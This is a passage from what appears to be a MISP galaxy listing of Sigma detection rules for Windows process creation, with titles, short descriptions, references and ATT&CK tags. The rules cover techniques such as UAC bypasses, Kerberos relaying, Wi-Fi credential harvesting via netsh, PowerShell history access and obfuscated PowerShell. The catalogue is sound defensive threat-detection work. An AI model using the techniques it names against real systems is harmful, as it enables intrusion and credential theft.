| filename | proc_creation_win_powershell_decrypt_pattern.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
HackTool - TruffleSnout Execution
Detects the use of TruffleSnout.exe, an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low-noise enumeration.
Internal MISP references
UUID 69ca006d-b9a9-47f5-80ff-ecd4d25d481a which can be used as unique global reference for HackTool - TruffleSnout Execution in MISP communities and other software using the MISP galaxy
External references
- https://github.com/dsnezhkov/TruffleSnout - webarchive
- https://github.com/dsnezhkov/TruffleSnout/blob/7c2f22e246ef704bc96c396f66fa854e9ca742b9/TruffleSnout/Docs/USAGE.md - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_trufflesnout.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1482'] |
Related clusters
To see the related clusters, click here.
UAC Bypass Tools Using ComputerDefaults
Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
Internal MISP references
UUID 3c05e90d-7eba-4324-9972-5d7f711a60a8 which can be used as unique global reference for UAC Bypass Tools Using ComputerDefaults in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-31 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_uac_bypass_computerdefaults.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution
Detects potentially suspicious child processes launched via the ScreenConnect client service.
Internal MISP references
UUID 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5 which can be used as unique global reference for Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html - webarchive
- https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 - webarchive
- https://www.mandiant.com/resources/telegram-malware-iranian-espionage - webarchive
- https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale |
| creation_date | 2022-02-25 |
| falsepositive | ['If the script being executed makes use of any of the utilities mentioned in the detection, it should be filtered out or allowed.'] |
| filename | proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Related clusters
To see the related clusters, click here.
PowerShell Set-Acl On Windows Folder
Detects PowerShell scripts to set the ACL to a file in the Windows folder
Internal MISP references
UUID 0944e002-e3f6-4eb5-bf69-3a3067b53d73 which can be used as unique global reference for PowerShell Set-Acl On Windows Folder in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1 - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-18 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_set_acl_susp_location.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Execute Code with Pester.bat as Parent
Detects code execution via Pester.bat (Pester - PowerShell module for testing)
Internal MISP references
UUID 18988e1b-9087-4f8a-82fe-0414dce49878 which can be used as unique global reference for Execute Code with Pester.bat as Parent in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali |
| creation_date | 2022-08-20 |
| falsepositive | ['Legitimate use of Pester for writing tests for Powershell scripts and modules'] |
| filename | proc_creation_win_lolbin_pester.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1216'] |
Related clusters
To see the related clusters, click here.
Scheduled Task Creation Masquerading as System Processes
Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
Internal MISP references
UUID 9f8573c9-22b4-40e3-89c1-72bc2b8d49ab which can be used as unique global reference for Scheduled Task Creation Masquerading as System Processes in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-02-05 |
| falsepositive | ['Legitimate system administration tasks scheduling trusted system processes.'] |
| filename | proc_creation_win_schtasks_system_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.defense-evasion', 'attack.t1036.004', 'attack.t1036.005'] |
Related clusters
To see the related clusters, click here.
Non-privileged Usage of Reg or Powershell
Detects usage of reg.exe or PowerShell by non-privileged users to modify service configuration in the registry
Internal MISP references
UUID 8f02c935-effe-45b3-8fc9-ef8696a9e41d which can be used as unique global reference for Non-privileged Usage of Reg or Powershell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community |
| creation_date | 2020-10-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_non_priv_reg_or_ps.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
PowerShell MSI Install via WindowsInstaller COM From Remote Location
Detects the execution of PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer) from a remote location. This could indicate malicious software deployment or lateral movement using Windows Installer functionality, and using the WindowsInstaller COM object rather than msiexec could be an attempt to bypass detection.
Internal MISP references
UUID 222720a7-047f-4054-baa5-bab9be757db0 which can be used as unique global reference for PowerShell MSI Install via WindowsInstaller COM From Remote Location in MISP communities and other software using the MISP galaxy
External references
- https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/ - webarchive
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/ - webarchive
- https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Meroujan Antonyan (vx3r) |
| creation_date | 2025-06-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_comobject_msi_remote.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1218', 'attack.command-and-control', 'attack.t1105'] |
Related clusters
To see the related clusters, click here.
Powershell Inline Execution From A File
Detects inline execution of PowerShell code from a file
Internal MISP references
UUID ee218c12-627a-4d27-9e30-d6fb2fe22ed2 which can be used as unique global reference for Powershell Inline Execution From A File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-12-25 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_exec_data_file.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.
Non Interactive PowerShell Process Spawned
Detects non-interactive PowerShell activity by looking for a "powershell" process whose parent is not a user-facing GUI process such as "explorer.exe".
Internal MISP references
UUID f4bbd493-b796-416e-bbf2-121235348529 which can be used as unique global reference for Non Interactive PowerShell Process Spawned in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
| creation_date | 2019-09-12 |
| falsepositive | ['Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies'] |
| filename | proc_creation_win_powershell_non_interactive_execution.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.
Nltest.EXE Execution
Detects nltest commands that can be used for information discovery
Internal MISP references
UUID 903076ff-f442-475a-b667-4f246bcc203b which can be used as unique global reference for Nltest.EXE Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Arun Chauhan |
| creation_date | 2023-02-03 |
| falsepositive | ['Legitimate administration activity'] |
| filename | proc_creation_win_nltest_execution.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1016', 'attack.t1018', 'attack.t1482'] |
Related clusters
To see the related clusters, click here.
New User Created Via Net.EXE
Identifies the creation of local users via the net.exe command.
Internal MISP references
UUID cd219ff3-fa99-45d4-8380-a7d15116c6dc which can be used as unique global reference for New User Created Via Net.EXE in MISP communities and other software using the MISP galaxy
External references
- https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Endgame, JHasenbusch (adapted to Sigma for oscd.community) |
| creation_date | 2018-10-30 |
| falsepositive | ['Legitimate user creation.', 'Better use event IDs for user creation rather than command line rules.'] |
| filename | proc_creation_win_net_user_add.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1136.001'] |
Program Executed Using Proxy/Local Command Via SSH.EXE
Detect usage of the "ssh.exe" binary as a proxy to launch other programs.
Internal MISP references
UUID 7d6d30b8-5b91-4b90-a891-46cccaf29598 which can be used as unique global reference for Program Executed Using Proxy/Local Command Via SSH.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Ssh/ - webarchive
- https://man.openbsd.org/ssh_config#LocalCommand - webarchive
- https://man.openbsd.org/ssh_config#ProxyCommand - webarchive
- https://gtfobins.github.io/gtfobins/ssh/ - webarchive
- https://github.com/LOLBAS-Project/LOLBAS/pull/211/files - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_proxy_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali |
| creation_date | 2022-12-29 |
| falsepositive | ['Legitimate usage for administration purposes'] |
| filename | proc_creation_win_ssh_proxy_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
File Download Via Bitsadmin To An Uncommon Target Folder
Detects usage of bitsadmin to download a file to an uncommon target folder.
Internal MISP references
UUID 6e30c82f-a9f8-4aab-b79c-7c12bce6f248 which can be used as unique global reference for File Download Via Bitsadmin To An Uncommon Target Folder in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ - webarchive
- https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - webarchive
- https://isc.sans.edu/diary/22264 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-28 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003'] |
Exchange PowerShell Snap-Ins Usage
Detects the adding and use of Exchange PowerShell snap-ins to export mailbox data, as seen used by HAFNIUM and APT27.
Internal MISP references
UUID 25676e10-2121-446e-80a4-71ff8506af47 which can be used as unique global reference for Exchange PowerShell Snap-Ins Usage in MISP communities and other software using the MISP galaxy
External references
- https://www.intrinsec.com/apt27-analysis/ - webarchive
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - webarchive
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-03-03 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_snapins_hafnium.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001', 'attack.collection', 'attack.t1114'] |
Harvesting Of Wifi Credentials Via Netsh.EXE
Detects the harvesting of Wi-Fi credentials using netsh.exe.
Internal MISP references
UUID 42b1a5b8-353f-4f10-b256-39de4467faff which can be used as unique global reference for Harvesting Of Wifi Credentials Via Netsh.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Andreas Hunkeler (@Karneades), oscd.community |
| creation_date | 2020-04-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_netsh_wifi_credential_harvesting.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.credential-access', 'attack.t1040'] |
HackTool - KrbRelay Execution
Detects the use of KrbRelay, a Kerberos relaying tool
Internal MISP references
UUID e96253b8-6b3b-4f90-9e59-3b24b99cf9b4 which can be used as unique global reference for HackTool - KrbRelay Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-04-27 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_krbrelay.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1558.003'] |
UAC Bypass Using PkgMgr and DISM
Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
Internal MISP references
UUID a743ceba-c771-4d75-97eb-8a90f7f4844c which can be used as unique global reference for UAC Bypass Using PkgMgr and DISM in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_uac_bypass_pkgmgr_dism.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Local File Read Using Curl.EXE
Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
Internal MISP references
UUID aa6f6ea6-0676-40dd-b510-6e46f02d8867 which can be used as unique global reference for Local File Read Using Curl.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-07-27 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_curl_local_file_read.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Active Directory Database Snapshot Via ADExplorer
Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database. Attackers can use this to extract data for BloodHound, collect usernames for password spraying, or use the metadata for social engineering. The snapshot does not contain password hashes, but there have been cases where administrators put passwords in the comment field.
Internal MISP references
UUID 9212f354-7775-4e28-9c9f-8f0a4544e664 which can be used as unique global reference for Active Directory Database Snapshot Via ADExplorer in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer - webarchive
- https://trustedsec.com/blog/adexplorer-on-engagements - webarchive
- https://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24 - webarchive
- https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/ - webarchive
- https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html - webarchive
- https://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-03-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_sysinternals_adexplorer_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1087.002', 'attack.t1069.002', 'attack.t1482'] |
Powershell Token Obfuscation - Process Creation
Detects the TOKEN OBFUSCATION technique from Invoke-Obfuscation.
Internal MISP references
UUID deb9b646-a508-44ee-b7c9-d8965921c6b6 which can be used as unique global reference for Powershell Token Obfuscation - Process Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-12-27 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_token_obfuscation.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027.009'] |
Disable Important Scheduled Task
Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data-destructive activities.
Internal MISP references
UUID 9ac94dc8-9042-493c-ba45-3b5e7c86b980 which can be used as unique global reference for Disable Important Scheduled Task in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://twitter.com/MichalKoczwara/status/1553634816016498688 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior |
| creation_date | 2021-12-26 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_schtasks_disable.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1489'] |
New Service Creation Using PowerShell
Detects the creation of a new service using PowerShell.
Internal MISP references
UUID c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 which can be used as unique global reference for New Service Creation Using PowerShell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community |
| creation_date | 2023-02-20 |
| falsepositive | ['Legitimate administrator or user creates a service for legitimate reasons.', 'Software installation'] |
| filename | proc_creation_win_powershell_create_service.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003'] |
Potential Persistence Via Logon Scripts - CommandLine
Detects the addition of a new logon script to the registry value "UserInitMprLogonScript" for potential persistence.
Internal MISP references
UUID 21d856f9-9281-4ded-9377-51a1a6e2a432 which can be used as unique global reference for Potential Persistence Via Logon Scripts - CommandLine in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tom Ueltschi (@c_APT_ure) |
| creation_date | 2019-01-12 |
| falsepositive | ['Legitimate addition of Logon Scripts via the command line by administrators or third party tools'] |
| filename | proc_creation_win_registry_logon_script.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1037.001'] |
Suspicious NTLM Authentication on the Printer Spooler Service
Detects a privilege elevation attempt that coerces NTLM authentication from the Print Spooler service.
Internal MISP references
UUID bb76d96b-821c-47cf-944b-7ce377864492 which can be used as unique global reference for Suspicious NTLM Authentication on the Printer Spooler Service in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/med0x2e/status/1520402518685200384 - webarchive
- https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Elastic (idea), Tobias Michalski (Nextron Systems) |
| creation_date | 2022-05-04 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_rundll32_ntlmrelay.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.credential-access', 'attack.t1212'] |
Invoke-Obfuscation Via Stdin
Detects obfuscated PowerShell passed via stdin in scripts.
Internal MISP references
UUID 9c14c9fa-1a63-4a64-8e57-d19280559490 which can be used as unique global reference for Invoke-Obfuscation Via Stdin in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nikita Nazarov, oscd.community |
| creation_date | 2020-10-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001'] |
Suspicious Child Process of AspNetCompiler
Detects potentially suspicious child processes of "aspnet_compiler.exe".
Internal MISP references
UUID 9ccba514-7cb6-4c5c-b377-700758f2f120 which can be used as unique global reference for Suspicious Child Process of AspNetCompiler in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - webarchive
- https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_aspnet_compiler_susp_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1127'] |
Potential MSTSC Shadowing Activity
Detects RDP session hijacking via MSTSC shadowing.
Internal MISP references
UUID 6ba5a05f-b095-4f0a-8654-b825f4f16334 which can be used as unique global reference for Potential MSTSC Shadowing Activity in MISP communities and other software using the MISP galaxy
External references
- https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet - webarchive
- https://twitter.com/kmkz_security/status/1220694202301976576 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2020-01-24 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_mstsc_rdp_hijack_shadowing.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1563.002'] |
Potential PowerShell Console History Access Attempt via History File
Detects potential access attempts to the PowerShell console history directly via the history file (ConsoleHost_history.txt). This can expose plaintext passwords used in PowerShell commands or serve general reconnaissance.
Internal MISP references
UUID f4ff7323-b5fc-4323-8b52-6b9408e15788 which can be used as unique global reference for Potential PowerShell Console History Access Attempt via History File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Luc Génaux |
| creation_date | 2025-04-03 |
| falsepositive | ['Legitimate access of the console history file is possible'] |
| filename | proc_creation_win_powershell_console_history_file_access.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1552.001'] |
Suspicious PowerShell Parameter Substring
Detects suspicious PowerShell invocations with a parameter substring.
Internal MISP references
UUID 36210e0d-5b19-485d-a087-c096088885f0 which can be used as unique global reference for Suspicious PowerShell Parameter Substring in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) |
| creation_date | 2019-01-16 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_susp_parameter_variation.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Service StartupType Change Via Sc.EXE
Detects the use of "sc.exe" to change the startup type of a service to "disabled" or "demand".
Internal MISP references
UUID 85c312b7-f44d-4a51-a024-d671c40b49fc which can be used as unique global reference for Service StartupType Change Via Sc.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-01 |
| falsepositive | ['False positives may occur with troubleshooting scripts'] |
| filename | proc_creation_win_sc_disable_service.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1562.001'] |
SQL Client Tools PowerShell Session Detection
This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server Management Studio. Script blocks are not logged in this case, so this utility can be used to bypass protection mechanisms based on the analysis of those logs.
Internal MISP references
UUID a746c9b8-a2fb-4ee5-a428-92bee9e99060 which can be used as unique global reference for SQL Client Tools PowerShell Session Detection in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/pabraeken/status/993298228840992768 - webarchive
- https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Agro (@agro_sev) oscd.community |
| creation_date | 2020-10-13 |
| falsepositive | ['Direct PS command execution through SQLToolsPS.exe is uncommon; a child process sqltoolsps.exe spawned by smss.exe is a legitimate action.'] |
| filename | proc_creation_win_mssql_sqltoolsps_susp_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1127'] |
Active Directory Structure Export Via Csvde.EXE
Detects the execution of "csvde.exe" in order to export the organizational Active Directory structure.
Internal MISP references
UUID e5d36acd-acb4-4c6f-a13f-9eb203d50099 which can be used as unique global reference for Active Directory Structure Export Via Csvde.EXE in MISP communities and other software using the MISP galaxy
External references
- https://redcanary.com/blog/msix-installers/ - webarchive
- https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf - webarchive
- https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit - webarchive
- https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csvde_export.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-03-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_csvde_export.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.exfiltration', 'attack.discovery', 'attack.t1087.002'] |
Suspicious Manipulation Of Default Accounts Via Net.EXE
Detects suspicious manipulation of default accounts such as 'administrator' and 'guest', for example enabling or disabling the accounts or changing their password.
Internal MISP references
UUID 5b768e71-86f2-4879-b448-81061cbae951 which can be used as unique global reference for Suspicious Manipulation Of Default Accounts Via Net.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html - webarchive
